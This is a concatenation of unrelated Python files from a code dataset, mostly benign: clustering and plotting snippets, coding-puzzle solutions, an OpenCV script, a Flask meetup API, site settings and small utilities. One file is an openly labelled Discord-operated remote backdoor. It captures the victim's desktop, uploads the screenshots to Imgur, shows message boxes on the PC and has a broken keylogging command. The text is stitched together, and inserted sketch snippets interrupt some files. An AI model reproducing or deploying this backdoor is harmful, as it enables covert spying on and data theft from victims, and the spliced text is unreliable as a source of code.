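    labels = KMeans(n_clusters=k, n_init=10, random_state=0).fit_predict(X)
    scores[k] = silhouette_score(X, labels, metric='euclidean')
best_k = max(scores, key=scores.get)
print(best_k)  # should recover 3 for this toy data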
epi_sample_ood = (result_ood['y_pred'][epi_index][index_sample])**squared\n# epi_sample_test = (result_test['y_pred'][epi_index][index_sample])**squared\n#\n# alea_sample_noise = (result_noise[sensor_index][severity_index][alea_key][alea_index][index_sample])**squared\n# alea_sample_drift = (result_drift[sensor_index][severity_index][alea_key][alea_index][index_sample])**squared\n# alea_sample_ood = (result_ood[alea_key][alea_index][index_sample])**squared\n# alea_sample_test = (result_test[alea_key][alea_index][index_sample])**squared\n#\n# alea_plot_list = [alea_sample_test,alea_sample_ood,alea_sample_drift,alea_sample_noise]\n# epi_plot_list = [epi_sample_test,epi_sample_ood,epi_sample_drift,epi_sample_noise]\n# combined_plot_list = [alea_sample+epi_sample for alea_sample,epi_sample in zip(alea_plot_list,epi_plot_list)]\n# pca = PCA(n_components=2)\n#\n# def get_stacked_labels(plot_list):\n# sample_test = plot_list[0]\n# labels = np.array([np.ones(sample_test.shape[0])*id for id in range(len(plot_list))]).reshape(-1)\n# stacked = np.stack(plot_list).reshape(-1,sample_test.shape[-1])\n# stacked_pc = pca.fit_transform(stacked)\n#\n# return stacked_pc,labels\n#\n# fig, (ax1,ax2,ax3) = plt.subplots(3,1,figsize=(5,10),dpi=150)\n# alea_stacked_pc, alea_pc_labels = get_stacked_labels(alea_plot_list)\n# epi_stacked_pc, epi_pc_labels = get_stacked_labels(epi_plot_list)\n# total_stacked_pc, total_pc_labels = get_stacked_labels(combined_plot_list)\n#\n# scat1=ax1.scatter(alea_stacked_pc[:,0], alea_stacked_pc[:,1],c=alea_pc_labels)\n# ax1.legend(*scat1.legend_elements())\n# scat2=ax2.scatter(epi_stacked_pc[:,0], epi_stacked_pc[:,1],c=epi_pc_labels)\n# ax2.legend(*scat2.legend_elements())\n# scat3=ax3.scatter(total_stacked_pc[:,0], total_stacked_pc[:,1],c=total_pc_labels)\n# ax3.legend(*scat3.legend_elements())\n#\n# #plot latent_z\n# sensor_index = -10\n# latent_z_test_mu = result_test['latent_z'][0][index_sample]\n# latent_z_test_std = result_test['latent_z'][1][index_sample]\n# latent_z_ood_mu = result_ood['latent_z'][0][index_sample]\n# latent_z_ood_std = result_ood['latent_z'][1][index_sample]\n# latent_z_noise_mu = result_noise[sensor_index][severity_index]['latent_z'][0][index_sample]\n# latent_z_noise_std = result_noise[sensor_index][severity_index]['latent_z'][1][index_sample]\n# latent_z_drift_mu = result_drift[sensor_index][severity_index]['latent_z'][0][index_sample]\n# latent_z_drift_std = result_drift[sensor_index][severity_index]['latent_z'][1][index_sample]\n#\n# def plot_noise_drift_severity(sensor_index,severity_index, mode=\"mu\"):\n# if mode == \"mu\":\n# latent_z_noise = result_noise[sensor_index][severity_index]['latent_z'][0][index_sample]\n# latent_z_drift = result_drift[sensor_index][severity_index]['latent_z'][0][index_sample]\n# else:\n# latent_z_noise= result_noise[sensor_index][severity_index]['latent_z'][1][index_sample]\n# latent_z_drift = result_drift[sensor_index][severity_index]['latent_z'][1][index_sample]\n#\n# scatter_shape = latent_z_noise[:,0].shape\n# plt.scatter(latent_z_noise[:,0],latent_z_noise[:,1], alpha=0.2, c =(1*np.ones(scatter_shape)).astype(int),cmap='summer')\n# plt.scatter(latent_z_drift[:,0],latent_z_drift[:,1], alpha=0.2, c =(1*np.ones(scatter_shape)).astype(int),cmap='viridis')\n#\n# plt.figure()\n# plot_alpha = 0.2\n# plt.scatter(latent_z_test_mu[:,0],latent_z_test_mu[:,1])\n# plt.scatter(latent_z_ood_mu[:,0],latent_z_ood_mu[:,1])\n# sensor_index = -11\n# for i in range(1,4):\n# 
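# --- Hedged editor's sketch: the stack-then-project pattern used by the
# --- commented get_stacked_labels() above: concatenate per-condition feature
# --- blocks, keep an integer label per block, project with one shared PCA.
import numpy as np
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt

groups = [np.random.randn(50, 10) + shift for shift in (0, 3, 6)]  # hypothetical
stacked = np.vstack(groups)
labels = np.repeat(np.arange(len(groups)), 50)

pc = PCA(n_components=2).fit_transform(stacked)
scat = plt.scatter(pc[:, 0], pc[:, 1], c=labels)
plt.legend(*scat.legend_elements())
plt.show()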
plot_noise_drift_severity(sensor_index=sensor_index,severity_index=i,mode=\"mu\")\n# plt.title(\"Z-MU SENSOR \"+str(sensor_index))\n#\n# plt.figure()\n# plot_alpha = 0.2\n# plt.scatter(latent_z_test_std[:,0],latent_z_test_std[:,1])\n# plt.scatter(latent_z_ood_std[:,0],latent_z_ood_std[:,1])\n# sensor_index = -11\n# for i in range(1,4):\n#     plot_noise_drift_severity(sensor_index=sensor_index,severity_index=i,mode=\"std\")\n# plt.title(\"Z-STD SENSOR \"+str(sensor_index))\n#\n# for i in range(17):\n#     sensor_index = i\n#     x_test_diff = (x_test_noise[sensor_index][0]-x_test_noise[sensor_index][2]).sum()\n#     print(\"NOISE:\"+str(i)+str(x_test_diff))\n# print(\"--------------\")\n# for i in range(17):\n#     sensor_index = i\n#     x_test_diff = (x_test_drift[sensor_index][0]-x_test_drift[sensor_index][2]).sum()\n#     print(\"DRIFT:\"+str(i)+str(x_test_diff))\n#\n# x_test_diff = (x_test_noise[sensor_index][0]-x_test_noise[sensor_index][3]).sum()\n# feature_index=-10\n# plt.figure()\n# plt.hist(x_test_noise[sensor_index][0][:,feature_index],alpha=0.25)\n# plt.hist(x_test_noise[sensor_index][-1][:,feature_index],alpha=0.25)\n# plt.hist(x_test_drift[sensor_index][-1][:,feature_index],alpha=0.25)\n# plt.legend([\"HEALTHY\",\"NOISE\",\"DRIFT\"])\n#\n#\n#\n","repo_name":"bangxiangyong/bae-drift-detection-zema-hydraulic","sub_path":"2_bayesian_autoencoder.py","file_name":"2_bayesian_autoencoder.py","file_ext":"py","file_size_in_byte":28667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"26879909274","text":"from typing import List\n\n\nclass Solution:\n    def search(self, nums: List[int], target: int) -> int:\n\n        l, r = 0, len(nums) - 1\n        while l < r:\n            mid = l + ((r - l) // 2)\n            if nums[mid] == target:\n                return mid\n            elif nums[mid] < target:\n                l = mid + 1\n            else:\n                r = mid\n\n        return l if nums[l] == target else -1\n\n\n\"\"\"\nRuntime: O(logN)\nSpace: O(1)\n\nRuntime: 260 ms, faster than 74.53% of Python3 online submissions for Binary Search.\nMemory Usage: 13.9 MB, less than 100.00% of Python3 online submissions for Binary Search.\n\"\"\"\n","repo_name":"SamSamhuns/wallbreakers_projekts","sub_path":"Leetcode/week_3/p0704_binary_search.py","file_name":"p0704_binary_search.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30974648724","text":"'''\nApproach-1 : Without Using Hash-Map\n'''\n\nclass Solution(object):\n    def findRestaurant(self, list1, list2):\n        \"\"\"\n        :type list1: List[str]\n        :type list2: List[str]\n        :rtype: List[str]\n        \"\"\"\n        CommonHotel = []\n        LeastIndexSum = float('inf')\n        for hotel in range(0,len(list1)):\n            if list1[hotel] in list2 :\n                index = list2.index(list1[hotel])\n                # a strictly smaller index sum discards earlier results;\n                # an equal sum is appended alongside them\n                if index+hotel < LeastIndexSum :\n                    LeastIndexSum = index+hotel\n                    CommonHotel = [list1[hotel]]\n                elif index+hotel == LeastIndexSum :\n                    CommonHotel.append(list1[hotel])\n        \n        return CommonHotel\n","repo_name":"shreyatpandey/Coding-Challenges","sub_path":"Python/Minimum Index Sum of Two Lists.py","file_name":"Minimum Index Sum of Two Lists.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10589454815","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport cv2 as cv\nimport sys\n\nCOLOR_RED = (0, 0, 255)\nCOLOR_GREEN = (0, 255, 0)\nCOLOR_BLUE = (255, 0, 0)\n\ndef preprocessing(img):\n    # conversao da imagem para escala de cinza\n    img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n    # aplicacao de filtro gaussiano\n    
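# --- Hedged editor's sketch: the hash-map counterpart ("Approach-2") of the
# --- findRestaurant solution above, O(len(list1) + len(list2)) instead of the
# --- repeated list2.index() scans.
def find_restaurant(list1, list2):
    pos = {name: i for i, name in enumerate(list1)}
    best, out = float('inf'), []
    for j, name in enumerate(list2):
        if name in pos:
            s = pos[name] + j
            if s < best:
                best, out = s, [name]
            elif s == best:
                out.append(name)
    return out

print(find_restaurant(["Shogun", "Tapioca", "KFC"], ["KFC", "Shogun"]))  # ['Shogun']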
imgblur = cv.GaussianBlur(img_gray, (3,3), 0)\n # aplicacao de filtro laplaciano\n imglap = cv.Laplacian(imgblur, cv.CV_16S, ksize=3)\n # conversao para uint8\n imgabs = cv.convertScaleAbs(imglap)\n # equalizacao de histograma\n imgeq = cv.equalizeHist(imgabs)\n # filtro de media\n imgblur = cv.blur(imgeq, (5,5))\n # limiarizacao binaria\n ret,thresh1 = cv.threshold(imgblur,120,255,cv.THRESH_BINARY_INV)\n # opening\n kernel = np.ones((13,13),np.uint8)\n opening = cv.morphologyEx(thresh1, cv.MORPH_OPEN, kernel)\n # dilatacao\n kernel_dl = np.ones((3,3),np.uint8)\n dilation = cv.dilate(opening,kernel_dl,iterations = 1)\n \n return dilation\n\ndef detect(file):\n output = cv.imread(file)\n jeans = cv.cvtColor(output, cv.COLOR_BGR2GRAY)\n jeans = cv.blur(jeans, (30,30))\n _, jeans = cv.threshold(jeans, 20, 255, cv.THRESH_BINARY)\n edges = cv.Canny(jeans, 50, 100)\n contours, _ = cv.findContours(edges, cv.RETR_LIST, cv.CHAIN_APPROX_NONE)\n for idx, contour in enumerate(contours):\n length = cv.arcLength(contour, closed=True)\n if length < 150: continue\n\n x,y,w,h = cv.boundingRect(contour)\n ellipse = cv.fitEllipse(contour)\n cv.putText(\n output, f'{int(length)}',\n (x+(w//2),y+(h//2)), cv.FONT_HERSHEY_SIMPLEX, 1.5, COLOR_GREEN, 5\n )\n cv.ellipse(output, ellipse, COLOR_RED, 2)\n\n cv.imwrite(f'{file.split()[0]}_out.png', output)\n\ndef main():\n [detect(f) for f in sys.argv[1:]]\n\nif __name__ == '__main__':\n main()\n","repo_name":"caiocmb7/python-rep","sub_path":"pdi/projetopdi/repositorio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16451212367","text":"import mini_fiction\nfrom mini_fiction.settings import Config as BaseConfig\n\n\nclass PonyfictionConfig:\n SITE_NAME = {'default': 'Библиотека ponyfiction.org'}\n SITE_INDEX_TITLE = {'default': 'Библиотека ponyfiction.org'}\n SITE_DESCRIPTION = {'default': 'Библиотека фанфиков по вселенной сериала My Little Pony: Friendship is Magic'}\n SITE_FEEDBACK = 'https://tabun.everypony.ru/talk/add/?talk_users=andreymal'\n COPYRIGHT = {'default': 'Все права принадлежат пони.'}\n\n SERVER_NAME_REGEX = r'(stories\\.everypony\\.(ru|org|info))|ponyfiction\\.org'\n\n USER_AGENT_POSTFIX = 'ponyfiction.org/{}'.format(mini_fiction.__version__)\n\n REGISTRATION_AUTO_LOGIN = True\n REGISTRATION_OPEN = True\n\n CELERY_CONFIG = dict(BaseConfig.CELERY_CONFIG)\n CELERY_CONFIG['task_always_eager'] = False\n\n SPHINX_DISABLED = False\n\n CAPTCHA_CLASS = 'mini_fiction.captcha.ReCaptcha'\n CAPTCHA_FOR_GUEST_COMMENTS = False\n\n LOCALSTATIC_ROOT = 'localstatic'\n LOCALTEMPLATES = 'templates'\n\n STORY_COMMENTS_BY_GUEST = False\n NEWS_COMMENTS_BY_GUEST = False\n MINIMUM_VOTES_FOR_VIEW = 5\n\n PUBLISH_SIZE_LIMIT = 400\n\n FAVICON_URL = '/localstatic/i/favicon.ico'\n\n SITEMAP_PING_URLS = ['http://google.com/ping?sitemap={url}']\n\n CONTACTS = [\n {\n 'name': 'xmpp',\n 'label': {\n 'default': 'Jabber ID (XMPP)',\n },\n 'schema': {\n 'regex': r'^.+@([^.@][^@]+)',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в адресе jabber: похоже, он неправильный'}\n },\n 'link_template': 'xmpp:{value}?message;type=chat',\n 'title_template': '{value}',\n },\n {\n 'name': 'skype',\n 'label': {\n 'default': 'Skype ID',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9\\._-]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в логине skype: похоже, он неправильный'}\n },\n 'link_template': 'skype:{value}',\n 'title_template': 
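# --- Hedged editor's sketch: the contour-filtering idea behind detect() above
# --- (threshold, find contours, keep only perimeters above a cutoff), run on a
# --- synthetic blob instead of the input photo.
import numpy as np
import cv2 as cv

img = np.zeros((200, 200), np.uint8)
cv.circle(img, (100, 100), 60, 255, -1)   # one large filled blob
contours, _ = cv.findContours(img, cv.RETR_LIST, cv.CHAIN_APPROX_NONE)
big = [c for c in contours if cv.arcLength(c, closed=True) >= 150]
print(len(contours), len(big))  # 1 1: the blob's perimeter passes the cutoff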
'{value}',\n },\n {\n 'name': 'telegram',\n 'label': {\n 'default': 'Telegram',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9\\._-]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в логине Telegram: похоже, он неправильный'}\n },\n 'link_template': 'https://t.me/{value}',\n 'title_template': '{value}',\n },\n {\n 'name': 'tabun',\n 'label': {\n 'default': 'Логин на Табуне',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9-_]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в имени пользователя: похоже, оно неправильно'}\n },\n 'link_template': 'https://tabun.everypony.ru/profile/{value}/',\n 'title_template': '{value}',\n },\n {\n 'name': 'forum',\n 'label': {\n 'default': 'Профиль на Форуме',\n },\n 'schema': {\n 'regex': r'^https?://forum.everypony.ru/memberlist.php\\?.+$',\n 'error_messages': {'regex': 'Вставьте полную ссылку на профиль'}\n },\n 'link_template': '{value}',\n 'title_template': '{value}',\n },\n {\n 'name': 'vk',\n 'label': {\n 'default': 'Логин ВКонтакте',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9\\._-]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в логине ВК: похоже, он неправильный'}\n },\n 'link_template': 'https://vk.com/{value}',\n 'title_template': '{value}',\n },\n ]\n","repo_name":"andreymal/ponyfiction.org","sub_path":"ponyfiction_settings.py","file_name":"ponyfiction_settings.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"12631025101","text":"import discord\nfrom discord.ext import commands\nimport pyautogui\nimport tempfile\nfrom imgurpython import ImgurClient\nfrom pynput.keyboard import Key, Listener\nimport os\nimport logging\nimport win32api\nimport win32console\nimport win32gui\nimport pythoncom, pyhooks\nfrom tkinter.commondialog import Dialog\nimport ctypes # An included library with Python install. 
\nimport time\nimport psutil\nimport keyboard\nimport time\n\ndef on_press(event):\n if event.key == \"\":\n print(\"Key pressed:\", event)\n\n# Define intents (all default intents are enabled)\nintents = discord.Intents.default()\n\n# Create a bot instance with the defined intents\nbot = commands.Bot(command_prefix='!', intents=intents)\n\ndef Mbox(title, text, style):\n return ctypes.windll.user32.MessageBoxW(0, text, title, style)\n\n# Replace with your own Imgur client ID and secret\nclient_id = 'C_ID'\nclient_secret = 'C_Secret'\n\n# Define the on_message event\n@bot.event\nasync def on_message(message):\n # Ignore messages sent by the bot itself\n if message.author == bot.user:\n return\n\n # Define a condition: If the message content is \"hello\"\n if message.content.lower() == 'keylog':\n await message.channel.send('Keylogging started!')\n while True:\n keyboard.on_press = on_press\n time.sleep(1)\n elif message.content.lower() == 'help':\n await message.channel.send('commands\\n\\nscreenshot - capture screenshot of desktop\\nkeylog - start keylogging feature\\nmsgbox (Message) - display a messaegbox on PC')\n\n elif message.content.lower() == 'msgbox':\n await message.channel.send('command 3')\n\n if 'msgbox' in message.content.lower():\n # Split the message content into words\n words = message.content.split()\n\n # Find the index of the command\n command_index = words.index('msgbox')\n command_keyword = \"msgbox\"\n # Check if there's any data following the command\n if command_index + 1 < len(words):\n # Get the data following the command\n command_index = message.content.lower().index(command_keyword)\n\n # Calculate the index of the data following the command (including spaces)\n data_index = command_index + len(command_keyword)\n\n # Get the data following the command (including spaces)\n data = message.content[data_index:]\n\n # Strip leading and trailing spaces from the data\n data = data.strip()\n Mbox(\"DORB\", data, 1)\n\n # Store the data in a variable or process it as needed\n print(\"Message sent:\", data)\n\n # You can also send the data back to the channel\n await message.channel.send(f\"Data following the command: {data}\")\n else:\n await message.channel.send(\"No data found following the command.\")\n\n # Another condition: If the message content contains \"question\"\n if 'screenshot' in message.content.lower():\n # Create an Imgur client instance\n client = ImgurClient(client_id, client_secret)\n\n # Take a screenshot\n screenshot = pyautogui.screenshot()\n\n # Save the screenshot to a temporary file\n with tempfile.NamedTemporaryFile(suffix='.png', delete=False) as temp_file:\n screenshot.save(temp_file.name)\n\n # Upload the image to Imgur\n uploaded_image = client.upload_from_path(temp_file.name, config=None, anon=True)\n\n # Get the link to the uploaded image\n image_link = uploaded_image['link']\n\n print(f\"Image uploaded to: {image_link}\")\n await message.channel.send(image_link)\n\n # This line is required to process commands, if you're using the commands extension\n\n# Replace 'your_token_here' with your bot's token\nbot.run('API_Key')\n","repo_name":"LogicPy/Python","sub_path":"DORB/DiscordOperatedRemoteBackdoor.py","file_name":"DiscordOperatedRemoteBackdoor.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"22723404601","text":"#\r\n# file name: RangeFinder_stub\r\n# Description: RangeFinder replacement code for those lacking hardware\r\n# 
Author(s): Mario Shebib \r\n#\r\n\r\nfrom time import sleep\r\n\r\nclass RangeFinder_stub:\r\n \"\"\"\r\n This class is a stub that imitates the range finder sensor for running the code without the hardware\r\n \"\"\" \r\n def __init__(self):\r\n try:\r\n self.file = open(\"./stub_text/initial_range.txt\", \"r\")\r\n except FileNotFoundError as e:\r\n print(\"Could not open test file for range finder.\")\r\n exit(1)\r\n\r\n def get_range(self):\r\n \"\"\"\r\n By decreasing or increasing the distance by 50 millimeters each time the code runs\r\n This method imitates the real life actions of a user interacting with the distance sensor.\r\n \"\"\"\r\n while True:\r\n line = self.file.readline().strip()\r\n if line != '':\r\n break\r\n sleep(2)\r\n return int(line)\r\n\r\nclass RangeFinder_Interactive_stub:\r\n def get_range(self):\r\n print(\"Range finder stub\")\r\n while True:\r\n try:\r\n range_value = int(input(\"Range in mm: \"))\r\n except ValueError:\r\n print(\"Invalid range.\")\r\n continue\r\n else:\r\n return range_value\r\n\r\n","repo_name":"MorganJamesSmith/sysc3010_group_project","sub_path":"src/stub/RangeFinder_stub.py","file_name":"RangeFinder_stub.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20965602644","text":"from flask import jsonify, request\nfrom ...v1 import version_1 as v1\nfrom ..schemas.meetup_schema import MeetupSchema\nfrom ..models.meetup_model import Meetup\nfrom flask_jwt_extended import (jwt_required, get_jwt_identity)\n\ndb = Meetup()\n\n@v1.route('/meetups', methods=['POST'])\ndef create_meetup():\n \"\"\" Function to create a meetup \"\"\"\n json_data = request.get_json()\n\n # No data has been provided\n if not json_data:\n return jsonify({'status': 400, 'error': 'No data provided'}), 400\n\n # Check if request is valid\n data, errors = MeetupSchema().load(json_data)\n if errors:\n return jsonify({'status': 400, 'error' : 'Invalid data. 
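# --- Hedged editor's sketch: because the stubs expose the same get_range()
# --- method as the real sensor class, callers can swap them freely in tests.
finder = RangeFinder_Interactive_stub()
distance_mm = finder.get_range()  # prompts on stdin instead of reading hardware
print("measured:", distance_mm, "mm")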
Please fill all required fields', 'errors': errors}), 400\n\n if db.exists('topic', data['topic']):\n return jsonify({'status': 409, 'message' : 'Meetup already does exists'}), 409\n\n \n # Save new meetup and return response\n new_meetup = db.save(data)\n result = MeetupSchema().dump(new_meetup).data\n return jsonify({'status': 201, 'message': 'Meetup created successfully', 'data': [result]}), 201\n\n@v1.route('/meetups/', methods=['GET'])\ndef fetch_meetup(meetup_id):\n \"\"\" Function to fetch specific meetup \"\"\"\n # Check if meetup exists \n if not db.exists('id', meetup_id):\n return jsonify({'status': 404, 'error': 'Meetup not found'}), 404\n\n # Get meetups \n meetups = db.fetch_by_id(meetup_id)\n result = MeetupSchema(many=True).dump(meetups).data\n return jsonify({'status':200, 'data':result}), 200\n\n@v1.route('/meetups/upcoming', methods=['GET'])\ndef fetch_upcoming_meetups():\n \"\"\" Function to fetch all meetups \"\"\"\n meetups = db.all()\n result = MeetupSchema(many=True).dump(meetups).data\n return jsonify({'status':200, 'data':result}), 200\n\n\n","repo_name":"MbuguaCaleb/Questioner-endpoints","sub_path":"app/api/v1/views/meetup_view.py","file_name":"meetup_view.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10226377611","text":"import os, sys\nfrom PIL import Image, ImageShow\n\nfrom read_input import read_input\n\nclass Tree:\n def __init__(self, height):\n self.visible_west = True\n self.visible_east = True\n self.visible_north = True\n self.visible_south = True\n self.distance_west = 0\n self.distance_east = 0\n self.distance_north = 0\n self.distance_south = 0\n self.height = height\n self.scenic_score = 0\n\ndef set_visible(grid, x,y):\n height = len(grid)\n width = len(grid[0])\n target = grid[x][y]\n #validate north\n for test_y in range(y-1, -1, -1):\n target.distance_north += 1\n if(grid[x][test_y].height >= target.height):\n target.visible_north = False\n break\n\n #validate south\n for test_y in range(y + 1,height):\n target.distance_south += 1\n if(grid[x][test_y].height >= target.height):\n target.visible_south = False\n break\n\n #validate west\n for test_x in range(x-1, -1, -1):\n target.distance_west += 1\n print(f\"west: this tree at {x} current index {test_x}\")\n if(grid[test_x][y].height >= target.height):\n target.visible_west = False\n break\n\n #validate east\n for test_x in range(x + 1,width):\n target.distance_east += 1\n if(grid[test_x][y].height >= target.height):\n target.visible_east = False\n break\n\n target.scenic_score = target.distance_west * target.distance_east * \\\n target.distance_north * target.distance_south\n\n\nif __name__ == '__main__':\n lines = read_input('../day8/input.txt')\n print(lines)\n grid = []\n #init grid with rows\n for y in range(len(lines)):\n grid.append([])\n for x in range(len(lines[y])):\n grid[-1].append(Tree(int(lines[y][x])))\n\n preview = Image.new(\"RGBA\", [len(lines[0]), len(lines)])\n print(grid)\n\n step = int(255 / 10)\n totalVisible = 0\n highestScore = 0\n bestTree = None\n highestCoords = (0,0)\n for y in range(len(grid)):\n for x in range(len(grid[y])):\n set_visible(grid, x,y)\n #g = 255 if grid[x][y].visible_north == True else 0\n #b = 255 if grid[x][y].visible_south == True else 0\n #preview.putpixel([x,y], (step * grid[y][x].height,g,b))\n target = grid[x][y]\n height = target.height\n visible = target.visible_north or target.visible_south \\\n or target.visible_east or 
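# --- Hedged editor's sketch: the (data, errors) unpacking in create_meetup()
# --- implies marshmallow 2.x, where load() returns an UnmarshalResult pair.
# --- Field names here are hypothetical.
from marshmallow import Schema, fields

class TopicSchema(Schema):
    topic = fields.Str(required=True)
    location = fields.Str(required=True)

data, errors = TopicSchema().load({'topic': 'Python'})
print(errors)  # {'location': ['Missing data for required field.']}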
target.visible_west\n            if visible:\n                totalVisible += 1\n            #preview.putpixel([y,x], ((step * height) if visible else 0,0,0,255))\n            preview.putpixel([y,x], (255,255,255) if visible else (0,0,0))\n\n            if target.scenic_score > highestScore:\n                highestScore = target.scenic_score\n                highestCoords = (x,y)\n                bestTree = target\n\n\n    ImageShow.show(preview)\n    print(totalVisible)\n    print(f\"Highest score: {highestScore} at {highestCoords}\")\n","repo_name":"jackson-fb/AOC2022","sub_path":"day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26539360748","text":"import sys\nimport glob\nfrom datetime import datetime\nfrom dateutil.parser import parse\nimport time\n\n\ndef file_get_contents(filename):\n    with open(filename) as f:\n        return f.read()\n\nif len(sys.argv) != 4:\n    print(\n        \"\\r\\n\\r\\nUsage: python kanari.py [path] [number of kanari files] [max age in days]\\r\\nExample: python kanari.py \\\"/srv/storage/backups/libvirt-filesystems/*/backup_kanarie.txt\\\" 13 8\\r\\n\\r\\n\")\n    sys.exit()\n\npath = sys.argv[1]\nnumberOfKanari = sys.argv[2]\nmaxAgeKanari = sys.argv[3]\n\nitems = glob.glob(path)\n\n# verify number of kanaries\nitemsFoundCnt = len(items)\nif int(itemsFoundCnt) != int(numberOfKanari):\n    print(\"CRITICAL: Number of kanari did not match, expected: {} got: {}\".format(numberOfKanari, itemsFoundCnt))\n    sys.exit()\n\nnow = datetime.now()\nsumDelta = 0\n\n# verify kanari age\nfor x in items:\n    datestring = file_get_contents(x)\n\n    datestring = datetime.strptime(datestring[0:8], '%Y%m%d')\n    # result is a typeof datetime.timedelta\n    delta = now - datestring\n    # accumulate across all files instead of resetting per file\n    sumDelta = sumDelta + delta.days\n\n    if delta.days > int(maxAgeKanari):\n        print(\"CRITICAL: kanari too old, max days ago expected: {} got date {}\".format(maxAgeKanari, delta.days))\n\naverage = sumDelta / itemsFoundCnt\nprint(\"OK: got {} kanari average age {} days\\r\\n\".format(itemsFoundCnt, average))\n","repo_name":"Hivos/nagios","sub_path":"kanari.py","file_name":"kanari.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73409330987","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nl = list(input().strip())\n\nstack = deque()\n\ncnt = 0\n\npriority = {\"+\":2,\"-\":2,\"*\":1,\"/\":1}\n\nfor i in l:\n    if \"A\" <= i <= \"Z\":\n        print(i,end=\"\")\n    else:\n        if len(stack) == 0:\n            stack.append(i)\n        elif i == \"(\":\n            stack.append(i)\n            cnt += 1\n        elif i == \")\":\n            temp = stack.pop()\n            while temp != \"(\":\n                print(temp,end=\"\")\n                temp = stack.pop()\n            cnt -= 1\n        else:\n            while len(stack) > 0 and stack[len(stack) - 1] in priority and priority[stack[len(stack) - 1]] <= priority[i]:\n                print(stack.pop(),end=\"\")\n            stack.append(i)\n\n\n\nwhile len(stack) != 0:\n    print(stack.pop(),end=\"\")","repo_name":"Yun-YeoJun/BOJ_Python","sub_path":"solutions/bj1918.py","file_name":"bj1918.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13275489758","text":"from collections import namedtuple\nimport os\nfrom pathlib import Path\n\nfrom flask import abort, Flask, render_template\nfrom flask_common import Common\n\napp = Flask(__name__)\ncommon = Common(app)\n\nLOGDIR = Path.home()/'.weechat/logs' # WIP: Make configurable.\np = Path(LOGDIR)\nMessage = 
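# --- Hedged editor's sketch: a worked example of the stack-based infix ->
# --- postfix conversion above; note the smaller priority value means higher
# --- precedence, and '<=' on equal priorities gives left associativity.
def to_postfix(expr, priority={"+": 2, "-": 2, "*": 1, "/": 1}):
    out, stack = [], []
    for ch in expr:
        if ch.isalpha():
            out.append(ch)
        elif ch == "(":
            stack.append(ch)
        elif ch == ")":
            while stack[-1] != "(":
                out.append(stack.pop())
            stack.pop()  # discard the '('
        else:
            while stack and stack[-1] in priority and priority[stack[-1]] <= priority[ch]:
                out.append(stack.pop())
            stack.append(ch)
    return "".join(out + stack[::-1])

print(to_postfix("A*(B+C)"))  # ABC+*
print(to_postfix("A+B*C"))    # ABC*+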
namedtuple('Message', ['timestamp', 'author', 'text'])\nchart = {}\nnum = 0\n\nclass Chat(object):\n def __init__(self, filepath, slug):\n self.filepath = filepath\n self.slug = slug\n \n @property\n def messages(self):\n msgs = []\n with open(self.filepath) as f:\n lines = f.readlines()\n\n for line in lines:\n broken_message = line.split()\n author = broken_message[2]\n if author in ('<--', '-->', '--', '=!=', '***'):\n continue\n timestamp = ' '.join(broken_message[:2])\n text = ' '.join(broken_message[3:])\n msgs.append(Message(timestamp, author, text))\n return msgs\n \n @property\n def title(self):\n return self.filepath.stem\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', chats=list(chart.values()))\n\n\n@app.route('/chat/')\ndef show_chat(slug):\n try:\n chat = chart[int(slug)]\n return render_template('chat.html', chat=chat)\n except (KeyError, ValueError):\n return 'Oops, that chat does not exist! :-)'\n except IOError:\n abort(404)\n\nif __name__ == '__main__':\n for f in sorted(list(p.iterdir()), key=os.path.getctime):\n if f.suffix == '.weechatlog':\n chart[num] = Chat(f.absolute(), slug=num)\n num += 1\n\n app.debug = True\n common.serve()\n","repo_name":"RJ722/weeread","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16477695413","text":"import json\nimport os\nimport argparse\n\ndef check_for_data(start, end, path, filetype):\n \"\"\"\n Parameters\n ----------\n start (int), the first year of data\n end (int), the last year of data\n path (str), path to where to look for data\n filetype (str), a string in the format 'somefiletype-{y}-{m}.someextension'\n Returns\n -------\n missing (list), a list of strings of the missing data\n \"\"\"\n contents = os.listdir(path)\n missing = list()\n\n for year in range(start, end + 